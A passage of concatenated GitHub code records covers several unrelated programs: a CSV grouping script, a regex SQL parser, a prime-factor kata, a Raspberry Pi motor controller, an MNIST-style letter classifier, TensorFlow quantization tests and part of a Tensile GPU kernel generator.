Summing over the merged groups is also supported.\n\n#http://stackoverflow.com/questions/2387697/best-way-to-convert-csv-data-to-dict\n#http://www.tbk.ren/article/168.html?from=similar\n\n# NOTE (assumption): these directory-name constants are referenced below but were never\n# defined in this file; placeholder values are supplied here so the script can run.\nAPP_DATA_DIRNAME = 'data'\nAPP_RESULT_DIRNAME = 'result'\nAPP_TOOLS_RESULT_DIRNAME = 'result'\n\ndef usage():\n    print('usage: _app.py -i <input csv file or directory> -g <group column index> -f <follow column index>')\n\ndef saveDataToCSV(title,data,filePath,fmt=''):\n    print(\"saving data to csv file:%s\" % filePath)\n\n    if os.path.isfile(filePath):\n        print(\"delete old csv file:%s\" % filePath)\n        os.remove(filePath)\n\n    file_handle = open(filePath,'w')\n\n    if fmt=='':\n        csv_writer = csv.writer(file_handle,delimiter=' ')\n    else:\n        csv_writer = csv.writer(file_handle,delimiter=fmt)\n\n    if len(title) > 0:
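\n        # write the header row first when the caller supplies one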
\n        csv_writer.writerow(title)\n\n    csv_writer.writerows(data)\n\n    file_handle.close()\n\n    print(\"saved end\")\n\ndef generateResultFilePath(dataFilePath,prefix=''):\n    print(\"generating result file path from data file path:%s\" % dataFilePath)\n    filename,fileext=os.path.splitext(os.path.basename(dataFilePath))\n\n    if prefix=='':\n        resultFileName = 'result_'+filename+'.csv'\n    else:\n        resultFileName = 'result'+prefix+filename+'.csv'\n\n    dataFileAbsPath = os.path.abspath(dataFilePath)\n\n    app_root_dir = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0])))\n    app_data_dir = app_root_dir + os.sep + APP_DATA_DIRNAME + os.sep\n    app_result_dir = app_root_dir + os.sep + APP_RESULT_DIRNAME + os.sep\n\n    result_tmp_dirstr = os.path.dirname(dataFileAbsPath).replace(app_data_dir,'')\n\n    resultFileDir = os.path.join(app_result_dir,result_tmp_dirstr)\n\n    if not os.path.exists(resultFileDir):\n        print(\"create directory:%s \" % resultFileDir)\n        os.makedirs(resultFileDir)\n\n    resultFilePath = os.path.join(resultFileDir,resultFileName)\n    print(\"result file path is:%s\" % resultFilePath)\n    print(\"generated end\")\n\n    return resultFilePath\n\ndef setSumResultPath(groupColumn,followColumn):\n    print(\"setting sum result path\")\n    result_tmp_dirstr = os.path.dirname(os.path.abspath(sys.argv[0]))\n\n    result_filename = 'g'+groupColumn+'_'+'f'+followColumn+'_'+'sum'\n    result_filename +='.csv'\n\n    sumResultPath = os.path.join(result_tmp_dirstr,APP_TOOLS_RESULT_DIRNAME,result_filename)\n\n    print(\"sum result path is:%s\" % sumResultPath)\n    print(\"set end\")\n\n    return sumResultPath\n\n\ndef sumByGroup(sumParams):\n    print(\"start acting\")\n\n    input_path=sumParams['input_path']\n    groupColumnIndex=sumParams['group_column']\n    followColumnIndex=sumParams['follow_column']\n\n    csvDictData={}\n\n    if os.path.isdir(input_path):\n        print(\"input path is a directory:%s\" % input_path)\n        for root,dirs,files in os.walk(os.path.abspath(input_path)):\n            for file in files:\n                filename,fileext=os.path.splitext(file)\n                if fileext=='.csv':\n                    singleFileData = []\n                    resultfileabspath = root+os.sep+file\n                    ##\n                    print(resultfileabspath)\n\n    elif os.path.isfile(input_path):\n        print(\"input file is a single file:%s\" % input_path)\n        resultfileabspath = os.path.abspath(input_path)\n        singleFileData = []\n        ##\n        print(resultfileabspath)\n\n\n\ndef main():\n    try:\n        # long option names must not include the leading \"--\", and \"help\" takes no argument\n        opts,args = getopt.getopt(sys.argv[1:],\"hi:g:f:\",[\"help\",\"input=\",\"group=\",\"follow=\"])\n    except getopt.GetoptError as err:\n        print(err)\n        usage()\n        sys.exit(2)\n\n    sumParams = {\n        'input_path':'',\n        'group_column':'',\n        'follow_column':''\n    }\n\n    for opt,arg in opts:\n        if opt in ('-h',\"--help\"):\n            usage()\n            sys.exit()\n        elif opt in ('-i','--input'):\n            sumParams['input_path']=arg\n        elif opt in ('-g','--group'):\n            sumParams['group_column']=arg\n        elif opt in ('-f','--follow'):\n            sumParams['follow_column']=arg\n\n    if sumParams['input_path'] != '':\n        sumByGroup(sumParams)\n    else:\n        sys.exit()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"hongshunyang/biotools.ucsc","sub_path":"genome/tools/_app.py","file_name":"_app.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38873375923","text":"import re\nimport json\n\n\nwhile True:\n\ts = input('>')\n\t# select id,name from book,user by where uid in (select id from book where bid <= 10);\n\t# . matches any character except a newline; + means one or more\n\tresult = 
re.match(r'\\s*select\\s*(?P<fields>.+)\\s*from\\s*(?P<tables>.+)\\s*by where\\s*(?P<condition>.*)\\s*$', s)\n\t# NOTE (assumption): the named groups above are reconstructed; the original names were\n\t# lost (apparently stripped as HTML-like markup). Any valid identifiers work with groupdict().\n\n\tif result:\n\t\tfor k,v in result.groupdict().items():\n\t\t\tprint(k, ': ', v)\n\telse:\n\t\tprint('None')","repo_name":"MoCuishle28/python-practice","sub_path":"DBMS_Simulate/re_test.py","file_name":"re_test.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19533448934","text":"def primeFactors(n):\n    a=[]\n    while n % 2 == 0:\n        a.append(2)\n        n = n // 2  # integer division keeps n an int\n    for i in range(3,int(abs(n)**0.5)+1,2):\n        while n % i == 0:\n            a.append(i)\n            n = n // i\n    if abs(n) > 2:\n        a.append(int(abs(n)))\n    return sorted(set(a))  # set() discards ordering, so dedupe first, then sort\ndef sum_for_list(lst):\n    a=[[x,primeFactors(x)] for x in lst]\n    b={}\n    for x,y in a:\n        for z in y:\n            if z in b:\n                b[z]+=x\n            else:\n                b[z]=x\n    return [[x,b[x]] for x in sorted(b.keys())]\n","repo_name":"sukanthm/codeWars_solutions","sub_path":"Sum by Factors.py","file_name":"Sum by Factors.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24729947891","text":"from display_conf import run\nimport sqlite3\n\n\n@run\ndef tkgpio_main():\n    from gpiozero import LED, Button, MCP3008, Motor\n    from time import sleep\n    from Adafruit_CharLCD import Adafruit_CharLCD\n\n    work_led_TO1 = LED(16)\n    work_led_TO2 = LED(19)\n    work_led_ODZ = LED(21)\n    potenciometer1_TO1 = MCP3008(0)\n    potenciometer2_TO2 = MCP3008(2)\n    potenciometer3_ODZ = MCP3008(6)\n    motor_TO1 = Motor(22, 23)\n    motor_TO2 = Motor(26, 24)\n    motor_ODZ = Motor(20, 12)\n    lcd = Adafruit_CharLCD(2, 3, 4, 5, 6, 7, 16, 2)\n    lcd2 = Adafruit_CharLCD(8, 25, 18, 14, 17, 27, 16, 2)\n    switch_TO1 = Button(15)\n    switch_TO2 = Button(13)\n    switch_ODZ = Button(11)\n    conn = sqlite3.connect(\n        \"C:/python_projects/praca_mgr/apps/flask_app/flask_application/instance/site.db\"\n    )\n\n    cur_slider = conn.cursor()\n    cur_checker = conn.cursor()\n\n    while True:\n        cur_checker.execute(\"SELECT * FROM checker\")\n        cur_slider.execute(\"SELECT * FROM slider\")\n\n        slider_list = cur_slider.fetchone()\n        checker_list = cur_checker.fetchone()\n\n        if checker_list[4] == \"false\":\n            if switch_TO1.is_pressed:\n                work_led_TO1.on()\n                motor_TO1.forward(potenciometer1_TO1.value)\n                lcd.clear()\n                lcd.message(\"TO1 Hz: %.2f\" % (potenciometer1_TO1.value * 50))\n\n                if switch_TO2.is_pressed:\n                    work_led_TO2.on()\n                    motor_TO2.forward(potenciometer2_TO2.value)\n                    lcd2.clear()\n                    lcd2.message(\"TO2: %.2f\" % (potenciometer2_TO2.value * 50))\n\n                    if switch_ODZ.is_pressed:\n                        work_led_ODZ.on()\n                        motor_ODZ.forward(potenciometer3_ODZ.value)\n                    else:\n                        work_led_ODZ.off()\n                        motor_ODZ.stop()\n                else:\n                    work_led_TO2.off()\n                    work_led_ODZ.off()\n                    motor_TO2.stop()\n                    motor_ODZ.stop()\n                    lcd2.clear()\n                    lcd2.message(\"TO2 Hz: %.2f\" % (0))\n            else:\n                work_led_TO1.off()\n                work_led_TO2.off()\n                work_led_ODZ.off()\n                motor_TO1.stop()\n                motor_TO2.stop()\n                motor_ODZ.stop()\n                lcd.clear()\n                lcd.message(\"TO1 Hz: %.2f\" % (0))\n                lcd2.clear()\n                lcd2.message(\"TO2 Hz: %.2f\" % (0))\n\n        if checker_list[4] == \"true\":\n            if checker_list[1] == \"true\":\n                work_led_TO1.on()\n                motor_TO1.forward((float(slider_list[1])) / 50.0)\n                lcd.clear()\n                lcd.message(\"TO1 Hz: %.2f\" % (float(slider_list[1])))\n\n                if checker_list[2] == \"true\":\n                    work_led_TO2.on()\n                    motor_TO2.forward((float(slider_list[2])) / 50)\n                    lcd2.clear()\n                    lcd2.message(\"TO2: %.2f\" % (float(slider_list[2])))\n\n                    if checker_list[3] == \"true\":\n                        work_led_ODZ.on()
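\n                        # NOTE (assumption): the web UI's sliders appear to range 0-50 (Hz);\n                        # dividing by 50 below maps that onto gpiozero's 0.0-1.0 motor speed.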
\n                        motor_ODZ.forward(float(slider_list[3]) / 50)\n                    else:\n                        work_led_ODZ.off()\n                        motor_ODZ.stop()\n\n                else:\n                    work_led_TO2.off()\n                    work_led_ODZ.off()\n                    motor_TO2.stop()\n                    motor_ODZ.stop()\n                    lcd2.clear()\n                    lcd2.message(\"TO2 Hz: %.2f\" % (0))\n            else:\n                work_led_TO1.off()\n                work_led_TO2.off()\n                work_led_ODZ.off()\n                motor_TO1.stop()\n                motor_TO2.stop()\n                motor_ODZ.stop()\n                lcd.clear()\n                lcd.message(\"TO1 Hz: %.2f\" % (0))\n                lcd2.clear()\n                lcd2.message(\"TO2 Hz: %.2f\" % (0))\n\n        elif checker_list[4] == \"true\" and not switch_TO1.is_pressed:\n            work_led_TO1.off()\n            work_led_TO2.off()\n            work_led_ODZ.off()\n            motor_TO1.stop()\n            motor_TO2.stop()\n            motor_ODZ.stop()\n            lcd.clear()\n            lcd.message(\"TO1 Hz: %.2f\" % (0))\n            lcd2.clear()\n            lcd2.message(\"TO2 Hz: %.2f\" % (0))\n\n        sleep(0.05)\n","repo_name":"barteksyko/tkgpio","sub_path":"run_tkgpio.py","file_name":"run_tkgpio.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33988223028","text":"'''Let's convert meters to centimeters!\n   Write a piece of code that:\n   1) Asks for the number of meters.\n   2) Computes the number of centimeters from the meters entered.\n   3) Prints the result.\n   HINTS\n   1) 1 meter has 100 centimeters, i.e. multiply the meter value by 100.\n   2) The meter value must be converted with float().\n'''\n\n\nmetros = float(input('Enter the number of meters: '))\nmetros_para_centimetro = lambda metros, centimetros=100: metros * centimetros\nprint(f'{metros_para_centimetro(metros)}cm')\n","repo_name":"carlosrjhoe/Python","sub_path":"Livro_Guia_prático_de_programação_python/Exercicios/exercicio_07.py","file_name":"exercicio_07.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1276639427","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sb\nimport random\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import plot_confusion_matrix\nfrom sklearn.neural_network import MLPClassifier\n\ndata_dir = \"/Users/cameronwalcott/Dropbox/Mac/Desktop/ITP 499/Datasets\"\nalphabet = pd.read_csv(os.path.join(data_dir,\"alphabet_letters.csv\"))\n# print(alphabet.head())\n\nwords = {0:'A',1:'B',2:'C',3:'D',4:'E',5:'F',6:'G',7:'H',8:'I',9:'J',10:'K',11:'L',12:'M',13:'N',\n         14:'O',15:'P',16:'Q',17:'R',18:'S',19:'T',20:'U',21:'V',22:'W',23:'X',24:'Y',25:'Z'}\n\n\ntarget = alphabet.iloc[:,:1]\nfeatures = alphabet.iloc[:,1:]\n# print(target)\n# print(features)\n\n\n# print(features.shape)\n# print(target.shape)\n#\n#\n# plt.figure(1)\n# sb.countplot(x=\"label\", data=target)\n# plt.show()\n#\n#\nletter = features.iloc[1340,:]\nletter = np.array(letter)\nletter = letter.reshape(28,28)\nl = words[target.iloc[1340,0]]\n\n# plt.imshow(letter, cmap=\"gray\")\n# plt.title(\"The letter is \" + str(l))\n# plt.show()\n\n\nX_train, X_test, y_train, y_test = \\\n    train_test_split(features,target,test_size=0.3, random_state=2021, stratify=target)\n\n\nX_train = X_train / 255\nX_test = X_test / 255\n\n\nmlp = MLPClassifier(hidden_layer_sizes=(100,100,100), activation=\"logistic\", max_iter=5,\n                    alpha=0.0001, solver=\"adam\", random_state=2021, learning_rate_init=0.01, verbose=True)\n\n# Train the network\nmlp.fit(X_train, y_train)\n\n# Display accuracy of the test data\nprint(\"The accuracy of the 
test data is: \", mlp.score(X_test, y_test))\n\n# Display confusion matrix\nplot_confusion_matrix(mlp, X_test, y_test)\nplt.show()\n\n\ny_pred = mlp.predict(X_test)\nprediction = y_pred[0]\n\nrow1 = X_test.iloc[0,:]\nrow1 = np.array(row1)\nrow1 = row1.reshape(28,28)\n\nplt.imshow(row1, cmap=\"gray\")\nplt.title(\"The predicted letter is \" + str(words[prediction]) + \" and the actual letter is \" + str(words[y_test.iloc[0,0]]))\nplt.show()\n\n\n\n# y_test is a DataFrame, so index it with .iloc; y_test[i] would raise a KeyError\nfailed = [i for i in range(len(y_test)) if y_test.iloc[i, 0] != y_pred[i]]\n# f_index = failed.sample(n=1).index\n#\n# sample = np.array(X_test.loc[f_index]).reshape(28,28)\n#\n# plt.imshow(sample, cmap=\"gray\")\n# plt.title(\"The failed predicted digit is: \" + str(y_pred[f_index]) + \". The Actual digit is: \" + str(int(y_test[f_index])))\n# plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"noremac19/DS-ML","sub_path":"walcott_cameron_hw5.py","file_name":"walcott_cameron_hw5.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15936913381","text":"\nimport numpy as np\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.platform import test\nclass QuantizedOpsTest(test.TestCase):\n  def __init__(self, method_name=\"runTest\"):\n    super(QuantizedOpsTest, self).__init__(method_name)\n  def testQuantizeOp(self):\n    expected_output = [1, 1, 2, 127, 255, 255]\n    with self.session(use_gpu=False) as sess:\n      x = constant_op.constant(\n          [1.0, 1.25, 1.75, 127.0, 255.0, 500.0],\n          shape=[6],\n          dtype=dtypes.float32)\n      x_min = 0.0\n      x_max = 255.0\n      op = array_ops.quantize(x, x_min, x_max, dtypes.quint8, mode=\"MIN_FIRST\")\n      value = self.evaluate(op)\n      self.assertArrayNear(expected_output, value.output, 0.1)\n  def testDequantizeOp(self):\n    expected_output = [1.0, 2.0, 4.0, 8.0, 16.0, 255.0]\n    inp = np.array([1, 2, 4, 8, 16, 255]).astype(np.uint8)\n    with self.session(use_gpu=False) as sess:\n      x = constant_op.constant(inp, shape=[6], dtype=dtypes.quint8)\n      x_min = 0.0\n      x_max = 255.0\n      op = array_ops.dequantize(x, x_min, x_max, mode=\"MIN_FIRST\")\n      value = self.evaluate(op)\n      self.assertArrayNear(expected_output, value, 0.1)\n  def testAxis(self):\n    def scale_per_slice(shape, axis, values):\n      out = np.take(values, np.remainder(np.arange(np.prod(shape)),\n                                         len(values))).reshape(shape)\n      if axis is not None:\n        scale_shape = [1] * len(shape)\n        scale_shape[axis] = shape[axis]\n        out *= np.arange(1, shape[axis] + 1).reshape(scale_shape)\n      return out\n    shape = np.array([2, 3, 4, 5])\n    values = np.array([-1, -0.5, 0, 0.3, 0.8, 0.555, 0.5], dtype=np.float32)\n    quant_values = np.array([-128, -64, 0, 38, 102, 71, 64], dtype=np.int32)\n    for axis in [None, 0, 1, 2, 3]:\n      inputs = constant_op.constant(scale_per_slice(shape, axis, values))\n      expected_quantized = scale_per_slice(shape, None, quant_values)\n      if axis is None:\n        min_range, max_range = -1.0, 0.8\n      else:\n        num_slices = shape[axis]\n        min_range, max_range = [], []\n        for slice_idx in range(num_slices):\n          min_range.append(-1.0 * (slice_idx + 1))\n          max_range.append(0.8 * (slice_idx + 1))\n      quantized = self.evaluate(\n          array_ops.quantize(\n              inputs,\n              min_range,\n              max_range,\n              T=dtypes.qint8,\n              mode=\"SCALED\",\n              round_mode=\"HALF_TO_EVEN\",\n              axis=axis)).output\n      self.assertAllEqual(quantized, expected_quantized)\n      if axis is not None:\n        quantized = self.evaluate(\n            array_ops.quantize(\n                inputs,
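\n                # passing axis - 4 exercises negative-axis handling (same dimension of the rank-4 input)\n                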
min_range,\n max_range,\n T=dtypes.qint8,\n mode=\"SCALED\",\n round_mode=\"HALF_TO_EVEN\",\n axis=(axis - 4))).output\n self.assertAllClose(quantized, expected_quantized)\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_2/quantized_ops_test.py.transformed.py","file_name":"quantized_ops_test.py.transformed.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21000983810","text":"from .TensileInstructions import DataType, Label, Module, vgpr, sgpr, accvgpr, \\\n Holder, SBranchIfNotZero\nfrom .TensileInstructions.Instructions import *\n\ndef allocPostLoopSrdSuppressRaw(ch: str, chAddress: str, labelStr: str, sgprLength) -> Module:\n module = Module(\"allocPostLoopSrdSuppress\")\n label = Label(\"%sAddrValid\"%labelStr, \"\")\n label2 = Label(\"%sAddrValid_End\"%labelStr, \"\")\n # Buffer-load uses one base read pointer stored in the SRD - set it here:\n module.add(SMovB32(dst=sgpr(\"Srd%s+0\"%ch), src=sgpr(\"Address%s+0\"%chAddress), comment=\"init SRD base address (lower)\" ))\n module.add(SMovB32(dst=sgpr(\"Srd%s+1\"%ch), src=sgpr(\"Address%s+1\"%chAddress), comment=\"init SRD base address (upper) + other fields\" ))\n module.add(SMovB32(dst=sgpr(\"Srd%s+3\"%ch), src=\"Srd127_96\", comment=\"Set bits 127_96 in post-loop SRD\"))\n module.add(SBranchIfNotZero(\"Address%s\"%chAddress, DataType('int64'), label))\n module.add(SMovB32(dst=sgpr(\"Srd%s+2\"%ch), src=0))\n module.add(SBranch(label2.getLabelName()))\n module.add(label)\n module.add(SMovB32(dst=sgpr(\"Srd%s+2\"%ch), src=sgprLength))\n module.add(label2)\n module.addSpaceLine()\n return module\n\ndef allocPostLoopSrdSuppress(ch: str, labelStr: str, sgprLength) -> Module:\n return allocPostLoopSrdSuppressRaw(ch, ch, labelStr, sgprLength)\n\n##############################################################################\n# WaitCnt\n# 3 components can contribute to the waitcnt:\n# - Pending global reads. (skipGlobalRead)\n# - Pending local write. 
(skipLocalWrite)\n# - Pending local reads (skipLocalRead)\n# If a skip* arg is -1, the associated component does not contribute to\n# the expected lgkmcnt or vmcnt\n##############################################################################\ndef wait(states, kernel, tPA, tPB, skipGlobalRead, skipLocalWrite, \\\n skipLocalRead, conservativeWaitCnt: int, comment):\n # skip = -1 -> ignore\n # skip = n -> waitcnt(n*num)\n\n lgkmcnt = 0 if skipLocalWrite > -1 or skipLocalRead > -1 else -1\n\n if skipLocalWrite > -1 or skipLocalRead > -1:\n if skipLocalWrite > -1:\n numA = 0 if kernel[\"DirectToLdsA\"] \\\n else tPA[\"nrp\"]*tPA[\"nrc\"]*max(tPA[\"nwcv\"],tPA[\"nwpv\"])//tPA[\"nwcvpi\"]\n numB = 0 if kernel[\"DirectToLdsB\"] \\\n else tPB[\"nrp\"]*tPB[\"nrc\"]*max(tPB[\"nwcv\"],tPB[\"nwpv\"])//tPB[\"nwcvpi\"]\n\n numM = 0\n if kernel[\"ProblemType\"][\"Sparse\"] and not kernel[\"DirectToVgprSparseMetadata\"]:\n tPM = tPA[\"tpsMetadata\"] if tPA[\"is_sparse\"] else tPB[\"tpsMetadata\"]\n numM = tPM[\"nrp\"]*tPM[\"nrc\"]*max(tPM[\"nwcv\"],tPM[\"nwpv\"])//tPM[\"nwcvpi\"]\n lgkmcnt += skipLocalWrite * (numA + numB + numM)\n if skipLocalRead > -1:\n readsPerIter = states.numReadsPerIterA + states.numReadsPerIterB + states.numReadsPerIterMetadata\n lgkmcnt += skipLocalRead * readsPerIter\n\n vmcnt = 0 if skipGlobalRead > -1 else -1\n if skipGlobalRead > -1:\n numA = kernel[\"NumLoadsPerpendicularA\"] * kernel[\"NumLoadsCoalescedA\"]\n numB = kernel[\"NumLoadsPerpendicularB\"] * kernel[\"NumLoadsCoalescedB\"]\n numM = 0\n if kernel[\"ProblemType\"][\"Sparse\"] and not kernel[\"DirectToVgprSparseMetadata\"]:\n numM = kernel[\"NumLoadsPerpendicularMetadata\"] * kernel[\"NumLoadsCoalescedMetadata\"]\n vmcnt += skipGlobalRead * (numA + numB + numM)\n\n # Unlike flat loads, BufferLoad do not increment the outstanding\n # lgkmcnt\n if lgkmcnt > -1 and not kernel[\"BufferLoad\"]:\n lgkmcnt += skipGlobalRead * (numA + numB + numM)\n\n if (conservativeWaitCnt & 0x2) and skipGlobalRead != -1 or \\\n (conservativeWaitCnt & 0x4) and skipLocalWrite != -1 or \\\n (conservativeWaitCnt & 0x8) and skipLocalRead != -1:\n imod = Module(\"ConservativeWaitCnt\")\n imod.add(SWaitCnt(lgkmcnt=0, vmcnt=0, vscnt=0, comment=\"debug %s\"%comment))\n imod.add(SBarrier(comment=\"debug\"))\n return imod\n\n maxLgkmcnt = states.asmCaps[\"MaxLgkmcnt\"]\n lgkmcnt = min(lgkmcnt, maxLgkmcnt)\n if lgkmcnt >= 0 and vmcnt >= 0:\n vmcnt = -1 # preserve prior behavior of removing vmcnt here?\n maxVmcnt = states.asmCaps[\"MaxVmcnt\"]\n vmcnt = min(vmcnt, maxVmcnt)\n # This line is added for backward compatibility\n vscnt = vmcnt if lgkmcnt != -1 and vmcnt != -1 and states.archCaps[\"SeparateVscnt\"] else -1\n\n waitcnt = SWaitCnt(lgkmcnt,vmcnt, vscnt, comment)\n return waitcnt\n\n##############################################################################\n# SyncThreads\n##############################################################################\ndef syncThreads(kernel, archCaps, comment=\"\"):\n imod = Module(\"syncThreads\")\n if kernel[\"NumThreads\"] > kernel[\"WavefrontSize\"]:\n if archCaps[\"SeparateVscnt\"]:\n imod.add(SWaitCnt(lgkmcnt=\"null\", comment=\"extra navi wait\"))\n elif kernel[\"ScheduleIterAlg\"] == 2 \\\n or kernel[\"PrefetchGlobalRead\"] == 2:\n imod.addComment(\"Skip force waitcnt0\")\n elif archCaps[\"Waitcnt0Disabled\"]:\n # FIXME: should we add s_waitcnt_vscnt?\n imod.add(SWaitCnt(lgkmcnt=0, vmcnt=0, vscnt=-1, comment=\"force waitcnt0\"))\n\n imod.add(SBarrier(comment=comment))\n else:\n 
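# NumThreads <= WavefrontSize means a single wavefront, which executes in lockstep; no barrier is needed\n        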
imod.addComment(\"Skip barrier: NumThreads=%s\"%(kernel[\"NumThreads\"]) + \\\n comment)\n return imod\n\ndef _getAccToArchInfo(kernel):\n matrixInstM = (kernel[\"MatrixInstM\"] * kernel[\"MatrixInstBM\"]) if (kernel[\"MatrixInstM\"] == 4) else kernel[\"MatrixInstM\"]\n matrixInstN = (kernel[\"MatrixInstN\"] * kernel[\"MatrixInstBN\"]) if (kernel[\"MatrixInstN\"] == 4) else kernel[\"MatrixInstN\"]\n matrixInstBM = 1 if (kernel[\"MatrixInstM\"] == 4) else kernel[\"MatrixInstBM\"]\n matrixInstBN = 1 if (kernel[\"MatrixInstN\"] == 4) else kernel[\"MatrixInstBN\"]\n\n OutputsPerMFMA1B = matrixInstM * matrixInstN // kernel[\"WavefrontSize\"]\n VectorWidth0 = kernel[\"VectorWidthA\"]\n outerTT0 = kernel[\"MIWaveTile\"][0] // VectorWidth0\n VectorWidth1 = kernel[\"VectorWidthB\"]\n outerTT1 = kernel[\"MIWaveTile\"][1] // VectorWidth1\n return matrixInstBM, matrixInstBN, OutputsPerMFMA1B, VectorWidth0, VectorWidth1, outerTT0, outerTT1\n\ndef getAccToArchLen(kernel):\n matrixInstBM, matrixInstBN, OutputsPerMFMA1B, VectorWidth0, VectorWidth1, outerTT0, outerTT1 = _getAccToArchInfo(kernel)\n return (outerTT1 * outerTT0 * matrixInstBN * matrixInstBM * OutputsPerMFMA1B * VectorWidth0 * VectorWidth1)\n\n##############################################################################\n# accToArchMapper\n# Provides forward (acc2arch) and backward (arch2acc) index transformation\n# - Forward transformation is currently used for acc->vgpr copying\n# - Backward transformation is used in ShiftVectorComponent() to map logical\n# C-tile index back to original acc index\n##############################################################################\ndef accToArchMapper(kernel):\n acc2arch = dict()\n arch2acc = dict()\n\n matrixInstBM, matrixInstBN, OutputsPerMFMA1B, VectorWidth0, VectorWidth1, outerTT0, outerTT1 = _getAccToArchInfo(kernel)\n\n for wgIdx1 in range(0, outerTT1):\n for wgIdx0 in range(0, outerTT0):\n for bIdx1 in range(0, matrixInstBN):\n for bIdx0 in range(0, matrixInstBM):\n for tIdx in range(0, OutputsPerMFMA1B):\n for vw1 in range(0, VectorWidth1):\n for vw0 in range(0, VectorWidth0):\n src, dst = 0, 0\n if kernel[\"SourceSwap\"]:\n src = tIdx + OutputsPerMFMA1B * (bIdx0 + matrixInstBM * (bIdx1 + matrixInstBN * (vw0 + VectorWidth0 * (wgIdx0 + outerTT0 * (vw1 + VectorWidth1 * (wgIdx1))))))\n dst = vw0 + VectorWidth0 * (bIdx0 + matrixInstBM * (wgIdx0 + outerTT0 * (vw1 + VectorWidth1 * (tIdx + OutputsPerMFMA1B * (bIdx1 + matrixInstBN * (wgIdx1))))))\n else:\n src = tIdx + OutputsPerMFMA1B * (bIdx1 + matrixInstBN * (bIdx0 + matrixInstBM * (vw0 + VectorWidth0 * (wgIdx0 + outerTT0 * (vw1 + VectorWidth1 * (wgIdx1))))))\n dst = vw0 + VectorWidth0 * (tIdx + OutputsPerMFMA1B * (bIdx0 + matrixInstBM * (wgIdx0 + outerTT0 * (vw1 + VectorWidth1 * (bIdx1 + matrixInstBN * (wgIdx1))))))\n acc2arch[src] = dst\n arch2acc[dst] = src\n return acc2arch, arch2acc\n\ndef accVgprImagNumOffset(kernel):\n acc2arch, _ = accToArchMapper(kernel)\n return len(acc2arch) * kernel[\"MIRegPerOut\"]\n\n##############################################################################\n# MapAcctoArch\n# function to map MFMA Acc Registers to Arch VGPR register\n##############################################################################\ndef mapAcctoArchRegs(kernel):\n acc2arch, _ = accToArchMapper(kernel)\n\n complexMultiplier = 2 if kernel[\"ProblemType\"][\"DataType\"].isComplex() else 1\n imod = Module(\"AccVgprRead\")\n imod.itemList = [None] * kernel[\"MIRegPerOut\"] * complexMultiplier * len(acc2arch)\n accImOffset = 
accVgprImagNumOffset(kernel)\n    for i in range(len(acc2arch)):\n        for cm in range(complexMultiplier):\n            for r in range(kernel[\"MIRegPerOut\"]):\n                destIdx = (acc2arch[i]*complexMultiplier + cm) * kernel[\"MIRegPerOut\"] + r\n                srcIdx = ((i * kernel[\"MIRegPerOut\"] + r) + (cm*accImOffset))\n                if not kernel[\"MIArchVgpr\"]:\n                    accStr = accvgpr(srcIdx)\n                    imod.itemList[destIdx] = VAccvgprReadB32(dst=vgpr(Holder(name=\"ValuC\")),\n                                                             src=accStr,\n                                                             comment=\"copy acc to vreg[%u]\" % destIdx)\n                else:\n                    imod.itemList[destIdx] = VMovB32(dst=vgpr(Holder(name=\"ValuC\")),\n                                                     src=vgpr(\"ValuC+%u\"%srcIdx),\n                                                     comment=\"copy MI out reg to vreg[%u]\" % destIdx)\n    return imod\n\n##############################################################################\n# MulMIoutAlphaToArch\n# function to handle MFMA alpha*MIout to Arch VGPR register\n##############################################################################\ndef mulMIoutAlphaToArch(kernel, startVgprAlphaTmp):\n    acc2arch, _ = accToArchMapper(kernel)\n\n    imod = Module(\"MulAlpha\")\n    imod.itemList = [None] * len(acc2arch)\n    for i in range(len(acc2arch)):\n        destIdx = acc2arch[i]\n        srcIdx = i * kernel[\"MIRegPerOut\"]\n        if kernel[\"ProblemType\"][\"ComputeDataType\"].isDouble():\n            imod.itemList[destIdx] = VMulF64(dst=vgpr(Holder(name=\"ValuC\"),2),\n                                             src0=sgpr(\"Alpha\",2), src1=vgpr(\"ValuC+%u\"%srcIdx,2),\n                                             comment=\"Multiply MI out reg with alpha\")\n        elif kernel[\"ProblemType\"][\"ComputeDataType\"].isSingle() or \\\n             (kernel[\"ProblemType\"][\"ComputeDataType\"].isHalf() and kernel[\"ProblemType\"][\"HighPrecisionAccumulate\"]):\n            imod.itemList[destIdx] = VMulF32(dst=vgpr(Holder(name=\"ValuC\")),\n                                             src0=sgpr(\"Alpha\"), src1=vgpr(\"ValuC+%u\"%srcIdx),\n                                             comment=\"Multiply MI out reg with alpha\")\n        elif (kernel[\"ProblemType\"][\"ComputeDataType\"].isHalf() and not kernel[\"ProblemType\"][\"HighPrecisionAccumulate\"]):\n            imod.itemList[destIdx] = VMulPKF16(dst=vgpr(Holder(name=\"ValuC\")),\n                                               src0=sgpr(\"Alpha\"),\n                                               src1=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Multiply MI out reg with alpha\")\n        elif kernel[\"ProblemType\"][\"ComputeDataType\"].isInt32():\n            imod.itemList[destIdx] = 